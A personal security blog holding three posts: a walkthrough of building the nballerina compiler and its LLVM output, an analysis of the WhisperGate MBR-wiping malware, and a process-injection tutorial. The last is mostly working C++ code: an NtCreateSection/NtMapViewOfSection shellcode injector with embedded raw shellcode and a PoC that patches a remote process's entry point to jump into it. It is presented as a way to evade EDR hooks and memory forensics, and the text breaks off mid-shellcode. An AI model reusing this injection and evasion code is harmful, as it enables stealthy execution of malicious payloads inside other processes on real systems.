rxOred's blog

Deep Dive Into Ballerina Runtime

Fri, 03 Feb 2023 16:28:21 +0530

Table of Content

Introduction

Ballerina is a cloud native language developed by a Sri Lankan company, which is the main reason made me wanna look into it. When I first heard about the project, I was pretty surprised to say the least. Because projects like this are somewhat uncommon among companies here.

Stable version of the language runs on JVM. However, what took my interest is their native compiler. I’ve been following its development since last year, when the main repository was nballerina-cpp.

Anyways, in this series of smol articles, Im gonna dive deep into nballerina runtime.

Samples and Source code

nballerina source code

repo containing all the scripts that I’ll be using

Environment

To build nballerina project, first we need to setup few things including ballerina itself.

Installing Ballerina

nballerina’s compiler is written in the language itself, therefore first we need the ballerina distribution package. It is better to clone this from github and build it yourself.

git clone --recursive git@github.com:ballerina-platform/ballerina-distribution.git

ballerina uses gradle

cd ballerina-distribution && ./gradlew build

Building nballerina

Now we can clone nballerina from its official repo

git clone git@github.com:ballerina-platform/nballerina.git

to build nballerina compiler

cd nballerina/compiler && bal build

to build ballerina runtime and examples

cd .. && make all

Overall Architecture

To give a summery, nballerina is a ccompiler front-end that works with llvm as a backend. This front-end is written in ballerina language itself and is located in the ./compiler directory. Above bal build command is used to compile the source and translate it to a .jar file, which then can be used with a java virtual machine to compile ballerina source files into llvm IR files (.ll).

// hello.bal

import ballerina/io;

public function main() {
	io:println("hello ballerina");
}

to compile the above source into llvm IR.

java -jar nballerina.jar <src>.bal

The above command generates 2 files. One is <src>._init.ll and the other is <src>.ll, and both of these are in llvm IR.

._init.ll file

If we open up the file with the extension ._init.ll,

@_Bi04root0 = constant {i32, i32, i64, i8 addrspace(1)*(i8 addrspace(1)*, i64)*, i64(i8 addrspace(1)*, i64, i8 addrspace(1)*)*, i64(i8 addrspace(1)*, i64, i8 addrspace(1)*)*, i64(i8 addrspace(1)*, i64)*, i64(i8 addrspace(1)*, i64, i64)*, i64(i8 addrspace(1)*, i64, i64)*, double(i8 addrspace(1)*, i64)*, i64(i8 addrspace(1)*, i64, double)*, i64(i8 addrspace(1)*, i64, double)*, i64, {i32}*, [0 x i64]} {i32 0, i32 0, i64 0, i8 addrspace(1)*(i8 addrspace(1)*, i64)* @_bal_list_generic_get_tagged, i64(i8 addrspace(1)*, i64, i8 addrspace(1)*)* @_bal_list_generic_set_tagged, i64(i8 addrspace(1)*, i64, i8 addrspace(1)*)* @_bal_list_generic_inexact_set_tagged, i64(i8 addrspace(1)*, i64)* @_bal_list_generic_get_int, i64(i8 addrspace(1)*, i64, i64)* @_bal_list_generic_set_int, i64(i8 addrspace(1)*, i64, i64)* @_bal_list_generic_inexact_set_int, double(i8 addrspace(1)*, i64)* @_bal_list_generic_get_float, i64(i8 addrspace(1)*, i64, double)* @_bal_list_generic_set_float, i64(i8 addrspace(1)*, i64, double)* @_bal_list_generic_inexact_set_float, i64 262143, {i32}* null, [0 x i64] []}
declare i8 addrspace(1)* @_bal_list_generic_get_tagged(i8 addrspace(1)*, i64)
declare i64 @_bal_list_generic_set_tagged(i8 addrspace(1)*, i64, i8 addrspace(1)*)
declare i64 @_bal_list_generic_inexact_set_tagged(i8 addrspace(1)*, i64, i8 addrspace(1)*)
declare i64 @_bal_list_generic_get_int(i8 addrspace(1)*, i64)
declare i64 @_bal_list_generic_set_int(i8 addrspace(1)*, i64, i64)
declare i64 @_bal_list_generic_inexact_set_int(i8 addrspace(1)*, i64, i64)
declare double @_bal_list_generic_get_float(i8 addrspace(1)*, i64)
declare i64 @_bal_list_generic_set_float(i8 addrspace(1)*, i64, double)
declare i64 @_bal_list_generic_inexact_set_float(i8 addrspace(1)*, i64, double)
declare void @_B04rootmain()
define void @_bal_main() {
  call void @_B04rootmain()
  ret void
}

Anyone famililar with little bit of llvm can easily understand above snippet. There, we can see a function called _bal_main. This function in turn calls another function declared _B04rootmain. However, there is llvm for implementation of that function as well as for our main fuction. Therefore it is safe to assume that this rootmain is in fact, our main function, or at least calls it.

To get a clear view, we can refer the source code.

// nballerina/runtime/main.c

int main() {
    _bal_stack_guard = __builtin_frame_address(0) - STACK_SIZE;
    _bal_main();
    return 0;
}

so this doesnt really give us any big clues on how our code gets executed but now we know for sure that the first few lines of code that’s gonna get executed is initialization of stack guard and call to function _bal_main, which we saw earlier.

Note that we might wanna pay attention to this stack guard implementation later on.

.ll file

Lets take a look at the other file nballerina compiler generated for us.

// hello.ll

@_bal_stack_guard = external global i8*
@_Bi04root0 = external constant {i32}
@.str0 = internal unnamed_addr constant {i16, i16, [20 x i8]} {i16 15, i16 15, [20 x i8] c"hello ballerina\00\00\00\00\00"}, align 8
[...]
declare void @_Bb02ioprintln(i8 addrspace(1)*)
define void @_B04rootmain() !dbg !5 {
  %1 = alloca i8 addrspace(1)*
  %2 = alloca i8 addrspace(1)*
  %3 = alloca i8
  %4 = load i8*, i8** @_bal_stack_guard
  %5 = icmp ult i8* %3, %4
  br i1 %5, label %16, label %6
[...]

.str0 is the hello world string we had in our source file. However, we dont exactly know how ballerina works with strings (might be the next topic I’ll go through).

In addition to that, definition for _B04rootmain function referenced in the hello._init.ll file. This as far as we can see, reflects the code we wrote in the source file’s main function.

At the bottom of hello.ll file, we can see the debug information nballerina compiler has generated for us.

// hello.ll

[...]
!llvm.module.flags = !{!0}
!llvm.dbg.cu = !{!2}
!0 = !{i32 2, !"Debug Info Version", i32 3}
!1 = !DIFile(filename:"hello.bal", directory:"")
!2 = distinct !DICompileUnit(language: DW_LANG_C99, file: !1, isOptimized: false, runtimeVersion: 0, emissionKind: FullDebug, splitDebugInlining: false)
!3 = !DISubroutineType(types: !4)
!4 = !{}
!5 = distinct !DISubprogram(name:"main", linkageName:"_B04rootmain", scope: !1, file: !1, line: 3, type: !3, spFlags: DISPFlagLocalToUnit | DISPFlagDefinition, unit: !2, retainedNodes: !6)
!6 = !{}
!7 = !DILocation(line: 0, column: 0, scope: !5)
!8 = !DILocation(line: 3, column: 16, scope: !5)
!9 = !DILocation(line: 4, column: 12, scope: !5)
!10 = !DILocation(line: 4, column: 1, scope: !5)
[...]

Line !5 of the above snippet confirms out assumption that main function is in fact, rootmain.

generation of llvm IR

By looking at the /compiler source, we can get a clear idea how above two files are being generated.

// main.bal

public function main(string[] filenames, *Options opts) returns error? {
	[...]
    foreach string filename in filenames {
        var [basename, ext] = basenameExtension(filename);
        if ext == SOURCE_EXTENSION {
            CompileError? err = compileBalFile(filename, basename, check chooseOutputBasename(basename, opts.outDir), nbackOptions, opts);
            if err is err:Internal {
                panic error(d:toString(err.detail()), err);
            }
			[...]
        }
        else if ext == TEST_EXTENSION {
            check compileBaltFile(filename, basename, opts.outDir ?: check file:parentPath(filename), nbackOptions, opts);
        }
    [...]

for each source file that are given as input to the nballerina compiler, it checks if extension is .bal (SOURCE_EXTENTION) or .balt (TEST_EXTENSION), in which the latter is the extension for ballerina test files. Then there’s somewhat common few lines of code for both conditions, a call to compileBalFile / compileBaltFile, passing filename, filename without extension (basename) and optional output directory and other few options as arguments.

// compile.bal

function compileBalFile(string filename, string basename, string? outputBasename, nback:Options nbackOptions, OutputOptions outOptions) returns CompileError? {
    CompileContext cx = new(basename, outputBasename, nbackOptions, outOptions);
    front:ResolvedModule mod = check processModule(cx, DEFAULT_ROOT_MODULE_ID, [ {filename} ], cx.outputFilename());
    check mod.validMain();
    check generateInitModule(cx, mod);
}

compileBalFile is a fairly simple function. Honestly I expected a 500 lines of long function.

First above function does some checks, most of which are not important at the moment, and calls generateInitModule with CompileContext and ResolveModuleas parameters.

// compile.bal

function generateInitModule(CompileContext cx, front:ResolvedModule entryMod) returns CompileError? {
    LlvmModule initMod = check cx.buildInitModule(filterFuncs(entryMod.getExports()));
    string? initOutFilename = cx.outputFilename("._init");
    if initOutFilename != () {
        check outputModule(initMod, initOutFilename, cx.outputOptions);
    }
}

It is clear from the above snippet that this function is the one that is reponsible for creating the file with ._init.ll extension, to the same file which they refer to as init module. Note that there is more to this funciton which we can simply ignore for now, such as what is this LlvmModule class and CompileContext. ouputModule function can be our next point of interest.

// output.bal

# The preferred output extension for the output filename.
const OUTPUT_EXTENSION = ".ll";

type OutputOptions record {
    string? target = ();
};

function outputModule(LlvmModule llMod, string outFilename, OutputOptions options) returns io:Error? {
    string? target = options.target;
    if target != () {
        llMod.setTarget(target);
    }
    return llMod.printModuleToFile(outFilename);
}

See the OUTPUT_EXTENSION is set to .ll. function outputModule takes LlvmModule as the first argument and outputs the file outFilename using llMod.printModuleToFile method, which simply a file i/o function.

llvm bytecode files

Those two files generated by nballerina.jar should then be linked with /runtime/balrt_inline.h to generate llvm bytecode file per each IR file.

/runtime/balrt_inline.h is the main header file of the runtime. This file, along with other .h files make up the file /runtime/balrt_inline.bc, which is a llvm bytecode file (.bc).

This bytecode file contains all the code that is necessary to run a ballerina source file compiled with nballerina compiler. In order for this to work, the compiler generated .ll files should also be converted into .bc with /runtime/balrt_inline.bc linked to it.

This can be done using llvm-link.

llvm-link hello._init.ll  ~/repos/nballerina/runtime/balrt_inline.bc -o hello._init.bc
llvm-link hello.ll ~/repos/nballerina/runtime/balrt_inline.bc -o hello.bc

llvm-link generates llvm bytecode files by linking the input IR file with ballerina runtime header file.

llvm bytecode files are basically bullshit unreadable version of IR so we wont be looking at those since there’s simply no use.

Next Steps

We went through some small components of ballerina runtime and compiler in this article. In the next one, we will explore LlvmModule and CompileContext.

WhisperGate

Wed, 19 Jan 2022 09:40:08 +0000

Table of content

Introduction

On 05.01.2022, Ukrain had to face a massive cyber attack. This attack was able to take down IT infrastructure of several organizations completely.

Microsoft incident response team recently released samples of malware used in the campaign.

Samples

virustotal filescan.io

Environment

    Windows 10 guest (Virtualbox)
    Windows 10 host

Tools

    IDA
    x32dbg
    bochs

Analysis

Behavioral analysis

malware needs administrative privileges in order to be successful.

Malware does not create any network traffic, registry modifications or file modifications

Upon restarting, device will boot into a screen displaying the following ransom note.

Static analysis

The PE

According to detect it easy, the file is a 32 bit PE file.

it is compiled and linked using MinGW (GCC 6.3.0) and GNU linker.

die shows entropy as 6.07208, which is high but it also says executable is not packed.

As usual, entropy in the .text section is higher than in the other sections.

strings in the binary are not encrypted. several strings shown in the above diagram gives hints about malware’s capabilities such as disk corruption.

Also, note that it shows a bitcoin wallet and a tox ID that can be used as signatures.

- 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv
- 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65

Executable does not have many imports. There’s no APIs related to cryptography eventhough malware claims to encrypt the files.

Code analysis

IDA shows that PE contains two TLS callbacks. Initially suspected these were for anti-debugging purposes but turns out to be no.

first TLS callback starts calling some function pointers if Reason is DLL_THREAD_ATTACH.

the second TLS callback simply returns if Reason is something other than DLL_THREAD_DETACH or DLL_PROCESS_DETACH, suggesting this may be de initializing whatever initialized by the tlscallback1.

start function calls sub_4011b0 after setting the app type.

sub_4011b0 calls function sub_403b60 that is responsible for main functionality of the malware.

the function copies 2048 bytes at global offset `` into the stack.

offset contains bytes of compiled x86 real mode boot sector code, along with the boot signature 0x55AA.

Then it calls CreateFileW passing \\\\.\\PhysicalDrive0 as filename argument. returned handle is then passed to WriteFile along with the stack buffer that contains boot sector code. If the call is successful, it will overwrite MBR (master boot record) with a custom boot sector.

After BIOS has done selecting the boot device it will load overwritten MBR into memory and the CPU will start executing a parasite bootloader.

Also, note that malware does not encrypt anything.

Extracting boot sector code

buffer containing boot sector code can be extracted by placing a breakpoint at the address where it is accessed and using the show in dump feature in x32dbg.

extracted buffer can be then saved as a raw binary file for further analysis.

Reversing boot sector code

cs segment register is initially initialized to 0x0, it is used to zero out ax and set up other segment registers. then loads the ransom note into si register.

Next instruction calls print_loop, which then calls print_char after loading al with the byte at si. And it will repeat this operation until [si] is null.

print_char uses BIOS interrupts to put a single character into the screen. A BIOS interrupt call is a feature of BIOS that allows bootloaders and early kernels to access BIOS services such as video memory access and low-level disk access. To use BIOS interrupts, ah register should be initialized to the function number. parameters passed down through registers and similar to x86 syscalls, int instruction is used to do the software interrupt along with the BIOS service number

For instance, in the above image, malware loads Display character function number 0x0e into ah and calls BIOS video service.

More about BIOS interrupts - Ralf Brown’s BIOS interrupt list.

After printing the ransom note, the overwritten code jumps into another label

which then jumps to label corrupt_c

Two insutrctions after segment register initialization sets word at 0x7c78 to 0x0000 and dword at 0x7c76 to 0x7c82 (‘AAAA’).

This basically initializes the DAP (Disk Address Packet) structure. DAP is a structure that should be initialized in memory in order to use Logical block addressing with interrupt 0x13. This structure is then should be passed through si register.

layout of the structure

    Offset	Size	Description
    0	1	size of packet (16 bytes)
    1	1	always 0
    2	2	number of sectors to transfer (max 127 on some BIOSes)
    4	4	transfer buffer (16 bit segment:16 bit offset) (see note #1)
    8	4	lower 32-bits of 48-bit starting LBA
    12	4	upper 16-bits of 48-bit starting LBA

before the interrupt call int 0x13, which is used for low-level disk access, ah register is initialized to 0x43, BIOS function number for writing sectors to the disk.

following registers are also initialized

    al      - 0x0 (close clock write)
    dl      - 0x80 (hard disk)
    si      - 0x7c72 (DAP)

The si register is loaded with address 0x7c72, which must be the disk address packet.

The next few instructions check whether an extended write operation is successful or not. if cf is set (errors) control flow gets redirected to loc_7c45, else, to loc_7c5d.

at loc_7c45, it increments the last element in the byte array by 1 and moves 0x1 to [0x7c7a]. int next instruction zero out [0x7c7e].

loc_7c5d adds 0xc7 to [0x7c7a] and 0x0 [0x7c7e]. clc clears the carry flag.

Both blocks jumps back to corrupt_c.

The loop will continue until the hard disk is completely overwritten by AAAAs.

The end

quick analysis report of WhisperGate stage 01 ends here.

#Spread Anarchy!

Process Hollowing? not really

Sat, 01 Jan 2022 10:21:31 +0000

(@bound by jademerien)

Table of Content

Introduction

Process hollowing is a code injection / evasion technique that is often used in malware.

Process hollowing technique works by hollowing out a legitimate process image and replacing it with malicous code.

A malware that uses process hollowing starts a target ** process with CREATE_SUSPENDED flag enabled. Then using the handler it got from created the process, it hollows out the legitimate executable image from the target process’s memory.

The problem

However, malware tends to use the same set of APIs for this task. Some of these APIs are,

- CreateProcessA
- WriteProcessMemory
- VirtualProtect
- VirtualAlloc

And it is very well known that these APIs are often monitored by defense solutions.

The other major disadvantage is that, when using above APIs for code injection, malware leaves a lot of memory artifacts which makes it easy for forensic analysts to indetify the parasite.

For example, in order to do a code injection in windows environment, first one must allocate enough memory in the target process for the parasite. This alone is not enough because those alocated memory regions should have executable (X) permission. Those regions should also be writable because, otherwise, WriteProcessMemory or any other API that writes to another process’s memory won’t simply work.

Therefore, Having both executable and writable permissions for a memory region is a strong indication of an infection.

The solution

Well, there are solutions for the 1st problem. For example, one can directly invoke syscalls without going through kernel32.dll.

Of course that’s good solution but it wont solve the second issue.

Basics

Userland defense solutions mostly operate by hooking common API calls and monitoring them for malicious content. These common APIs include the ones that malware often uses for various injection techniques. to name a few,

- OpenProcess / CreateProcess 
- VirtualAlloc
- VirtualProtect
- WriteProcessMemory

In past, malware authors extensively used VirtualAlloc to inject malicous code in to a target process. They acheived this buy allocating a memory chunk of RWX permissions, which in fact, became a well know indication of code injection (Memory artifact).

As a solution to this, malware authors used a combination of VirtualAlloc and VirtualProtect to inject code into a remote process. First, malware allocates a memory chunk in the remote process with RW permissions using VirtualAlloc, then it change the permission to RX using VirtualProtect.

Although this seem like a victory (since it gets rid off RWX sections), defense solutions began hooking these two calls.

Then malware authors came up with another technique, which uses two APIs from NTAPI. (well, then defense solutions hooked ntdll but as I previously mentioned, that’s out of scope of this blog post)

In order to understand the technique, one must understand how following functions from NTAPIs work.

- NtCreateSection
- NtMapViewOfSection
- ZwUnmapViewOfSection
- NtSetContextThread

For that purpose, we are going to write a small shellcode injector using some of above functions.

#include <iostream>
#include <Windows.h>
#include <winternl.h>

#pragma comment(lib, "ntdll")

unsigned char buf[] = 
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67"
"\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3"
"\x68\x6b\x74\x58\x20\x68\x74\x20\x72\x65\x68\x45\x3d\x67\x65"
"\x68\x54\x49\x54\x4c\x68\x72\x65\x6b\x74\x68\x67\x65\x74\x20"
"\x31\xc9\x88\x4c\x24\x16\x89\xe1\x31\xd2\x52\x53\x51\x52\xff"
"\xd0\x31\xc0\x50\xff\x55\x08";

int main(int argc, char *argv[])
{
    if (argc == 2) 
    {
        LARGE_INTEGER sectionSize = { sizeof buf };
        HANDLE sectionHandle = NULL;
        PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;

        // create a read write execute memory region in the local process
        if (fNtCreateSection(
                &sectionHandle, 
                SECTION_ALL_ACCESS, 
                NULL,
                (PLARGE_INTEGER)&sectionSize, 
                PAGE_EXECUTE_READWRITE, 
                SEC_COMMIT, NULL) != STATUS_SUCCESS)
        {
            std::cout << "[x]Create section failed\n";
            return 0;
        }


        SIZE_T size = sizeof buf;

        // create a view of the memory section in the local process
        if (fNtMapViewOfSection(
                sectionHandle, 
                GetCurrentProcess(), 
                &localSectionAddress, 
                NULL, NULL, NULL, 
                &size, 2, NULL, 
                PAGE_READWRITE) != STATUS_SUCCESS)
        {
            std::cout << "[x]Create map failed\n";
            return 0;
        }

        HANDLE processHandle = OpenProcess(
                PROCESS_ALL_ACCESS, 
                FALSE, 
                DWORD(atoi(argv[1])));
        if (processHandle == NULL)
        {
            std::cout << "[x] Open process failed\n";
            return 0;
        }  
        // create a map view of the section in the target process
        if (fNtMapViewOfSection(
                sectionHandle, 
                processHandle, 
                &remoteSectionAddress, 
                NULL, NULL, NULL,
                &size, 2, NULL, 
                PAGE_EXECUTE_READ) != STATUS_SUCCESS)
        {
            std::cout << "[x]Create map failed\n";
            return 0;
        }

        std::cout << "remote section created" << std::endl;

        memcpy(localSectionAddress, buf, sizeof(buf));

        std::cout << "Shellcode injected at 0x" << std::hex << remoteSectionAddress << std::endl;

        CloseHandle(sectionHandle);
        HANDLE targetThreadHandle = NULL;
        fRtlCreateUserThread(
                processHandle, 
                NULL, 
                FALSE, 0, 0, 0, 
                remoteSectionAddress, 
                NULL, 
                &targetThreadHandle, NULL
            );
    }
    else 
    {
        std::cout << "./whatever.exe <pid>" << std::endl;
    }
}

NtCreateSection function creates a shared section of memory that two or more processes can read from and write into. The function expects ** address of an uninitalized section handle. This section handle is initialized by the function and will be used when referencing to that specific section

NtMapViewOfSection is the function that uses initliazed section handle return as the output parameter of NtCreateSection. The function creates a mapping of the section referenced with section handle in the process user specifies.

In the above snippet, NtCreateSection is used to createe a section with permissions PAGE_EXECUTE_READWRITE of size sizeof buf.

then two calls to NtMapViewOfSection are used to map the section into local process and the remote process. Permissions for the mapping of local process is PAGE_READWRITE while permissions for the remote process ’s mapping is PAGE_EXECUTE_READ.

This clearly shows the advantage of NtCreateSection + NtMapViewOfSection over many other process injection techniques. Since memory is allocated in the target process with permissions of PAGE_EXECUTE_READ, calls to VirtualAlloc wont be required. This also helps against some EDR solutions

shellcode started crashing).

here’s the result.

mapped section in remote process

Now the APIs are understood, it is time to demonstrate the process hollowing technique using above code injection technique.

Implementation

Before implementing it is essential to undersand what can be done and what we are going to do with the above injection technique.

Since this post is about process hollowing, anyone can guess we are going to hollow out the target process image and inject a shellcode using the above technique, but simply put, no.

The steps can be briefly described as follow.

- Injecting the shellcode into target process
- Retrieve ImageBaseAddress of the executable image
- Read executable image of the remote process into a buffer
- Unmap executable image from the process 
- Hook somewhere of the copied image so it will jump to shellcode
- Remap the section into the remote process using above techniques

Here is the PoC code.

#include <iostream>
#include <Windows.h>
#include <winternl.h>

#pragma comment(lib, "ntdll")

#define SECTION_SIZE 0x1000

typedef struct {
    HRSRC shellcodeResource;
    SIZE_T shellcodeSize;
    BYTE* shellcode;
} SHELLCODE;

typedef struct {
    HANDLE processHandle;
    DWORD imageBaseAddress;
    DWORD entryPoint;
} HOST;

#if !defined NTSTATUS
typedef LONG NTSTATUS;
#endif

#define STATUS_SUCCESS 0

typedef CLIENT_ID* PCLIENT_ID;

using myNtCreateSection = NTSTATUS(NTAPI*)(
    OUT PHANDLE SectionHandle,
    IN ULONG DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN PLARGE_INTEGER MaximumSize OPTIONAL,
    IN ULONG PageAttributess,
    IN ULONG SectionAttributes,
    IN HANDLE FileHandle OPTIONAL
    );

using myNtMapViewOfSection = NTSTATUS(NTAPI*)(
    HANDLE SectionHandle,
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    SIZE_T CommitSize,
    PLARGE_INTEGER SectionOffset,
    PSIZE_T ViewSize,
    DWORD InheritDisposition,
    ULONG AllocationType,
    ULONG Win32Protect
    );

using myZwUnmapViewOfSection = NTSTATUS(NTAPI*)(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress
    );

using myNtGetContextThread = NTSTATUS(NTAPI*) (
    IN HANDLE ThreadHandle,
    OUT PCONTEXT Context
    );

using myNtSetContextThread = NTSTATUS(NTAPI*) (
    IN HANDLE ThreadHandle,
    IN PCONTEXT Context
    );

myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(
    GetModuleHandleA("ntdll"),
    "NtCreateSection"));
myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(
    GetModuleHandleA("ntdll"),
    "NtMapViewOfSection"));
myZwUnmapViewOfSection fZwUnmapViewOfSection = (myZwUnmapViewOfSection)(GetProcAddress(
    GetModuleHandleA("ntdll"),
    "ZwUnmapViewOfSection"));
myNtGetContextThread fNtGetContextThread = (myNtGetContextThread)(GetProcAddress(
    GetModuleHandleA("ntdll"),
    "NtGetContextThread"));
myNtSetContextThread fNtSetContextThread = (myNtSetContextThread)(GetProcAddress(
    GetModuleHandleA("ntdll"),
    "NtSetContextThread"));

DWORD GetSizeOfImage(BYTE* processImage)
{
    IMAGE_DOS_HEADER* dosHeader = NULL;
    IMAGE_NT_HEADERS* ntHeaders = NULL;

    dosHeader = (IMAGE_DOS_HEADER*)processImage;
    ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)processImage + dosHeader->e_lfanew);

    return ntHeaders->OptionalHeader.SizeOfImage;
}

DWORD GetEntryPoint(BYTE* processImage)
{
    IMAGE_DOS_HEADER* dosHeader = NULL;
    IMAGE_NT_HEADERS* ntHeaders = NULL;

    dosHeader = (IMAGE_DOS_HEADER*)processImage;
    ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)processImage + dosHeader->e_lfanew);

    return (ntHeaders->OptionalHeader.AddressOfEntryPoint);
}

PVOID PatchHostProcess(HOST* hostProcess, PVOID shellcodeAddress)
{
    // read enough bytes to get the size of image
    SIZE_T bytesRead = 0;
    BYTE* imageData = new(BYTE[SECTION_SIZE]);

    // both calls read the same chunk of same size because this readprocessmemory fails we change the size 
    if (!ReadProcessMemory(
        hostProcess->processHandle, 
        (LPCVOID)hostProcess->imageBaseAddress, 
        imageData,
        SECTION_SIZE, 
        &bytesRead) && bytesRead != SECTION_SIZE)
    {
        std::cout << "[!] failed to read process image headers" << std::endl;
        return NULL;
    }

    DWORD sizeOfImage = GetSizeOfImage(imageData);
    delete[] imageData;

    BYTE* processImage = new(BYTE[sizeOfImage]);
    if (!ReadProcessMemory(
        hostProcess->processHandle, 
        (LPCVOID)hostProcess->imageBaseAddress, 
        processImage,
        sizeOfImage, 
        &bytesRead) && bytesRead != sizeOfImage)
    {
        std::cout << "[!] failed to read process image" << std::endl;
        return NULL;
    }

    DWORD entryPoint = GetEntryPoint(processImage);

    std::cout << "[!]Original entry point : 0x" << std::hex << hostProcess->imageBaseAddress + entryPoint << std::endl;

    memset(processImage + entryPoint, 0x90, 5);

    DWORD processEntry = hostProcess->imageBaseAddress + entryPoint;

    DWORD relativeAddr = (((DWORD)shellcodeAddress - processEntry) - 5);

    *((BYTE*)processImage + entryPoint) = 0xe9; // jmp
    *(uintptr_t*)((uintptr_t)processImage + entryPoint + 1) = relativeAddr; // address

    LARGE_INTEGER sectionSize = { sizeOfImage };
    HANDLE sectionHandle = NULL;
    PVOID sectionAddress = NULL;

    if (fNtCreateSection(
        &sectionHandle, 
        SECTION_ALL_ACCESS, 
        NULL, 
        (PLARGE_INTEGER)&sectionSize, 
        PAGE_EXECUTE_READWRITE,
        SEC_COMMIT, NULL) != STATUS_SUCCESS)
    {
        std::cout << "[!] create section failed" << std::endl;
        return NULL;
    }

    if (fNtMapViewOfSection(
        sectionHandle, 
        GetCurrentProcess(), 
        &sectionAddress, 
        NULL, NULL, NULL, 
        &bytesRead, 2, NULL, 
        PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
    {
        std::cout << "[!] create section failed" << std::endl;
        return NULL;
    }

    std::cout << "[!]replacing patched process image at 0x" << std::hex << hostProcess->imageBaseAddress << std::endl;

    memcpy(sectionAddress, processImage, sizeOfImage);
    sectionAddress = (PVOID)hostProcess->imageBaseAddress;

    if (fZwUnmapViewOfSection(
        hostProcess->processHandle, 
        sectionAddress) != STATUS_SUCCESS)
    {
        std::cout << "[!] unmapping failed" << std::endl;
        return NULL;
    }

    if (fNtMapViewOfSection(
        sectionHandle, 
        hostProcess->processHandle, 
        &sectionAddress, 
        NULL, NULL, NULL,
        &bytesRead, 
        2, NULL, 
        PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
    {
        std::cout << "create section failed" << std::endl;
        return NULL;
    }

    CloseHandle(sectionHandle);

    delete[] processImage;
    return (PVOID)processEntry;
}

PVOID InjectShellcode(HOST* hostProcess, SHELLCODE* s)
{
    LARGE_INTEGER sectionSize = { s->shellcodeSize };
    HANDLE sectionHandle = NULL;
    PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;

    // create a read write execute memory region in the local process
    if (fNtCreateSection(
        &sectionHandle, 
        SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, 
        NULL,
        (PLARGE_INTEGER)&sectionSize, 
        PAGE_EXECUTE_READWRITE, 
        SEC_COMMIT, 
        NULL) != STATUS_SUCCESS)
    {
        std::cout << "[x]Create section failed\n";
        return NULL;
    }

    // create a view of the memory section in the local process
    if (fNtMapViewOfSection(
        sectionHandle, 
        GetCurrentProcess(), 
        &localSectionAddress, 
        NULL, NULL, NULL,
        &s->shellcodeSize, 
        2, NULL, 
        PAGE_READWRITE) != STATUS_SUCCESS)
    {
        std::cout << "[x]Create map failed\n";
        return NULL;
    }

    // create a map view of the section in the target process
    if (fNtMapViewOfSection(
        sectionHandle, 
        hostProcess->processHandle, 
        &remoteSectionAddress, 
        NULL, NULL, NULL,
        &s->shellcodeSize, 
        2, NULL, 
        PAGE_EXECUTE_READ) != STATUS_SUCCESS)
    {
        std::cout << "[x]Create map failed\n";
        return NULL;
    }

    memcpy(localSectionAddress, s->shellcode, s->shellcodeSize);
    std::cout << "[!]Shellcode injected to 0x" << std::hex << (DWORD)remoteSectionAddress << std::endl;

    CloseHandle(sectionHandle);
    return remoteSectionAddress;
}


int main(void)
{
    unsigned char buf[] = 
        "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
        "\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
        "\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
        "\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
        "\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
        "\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
        "\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
        "\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
        "\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
        "\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
        "\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
        "\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
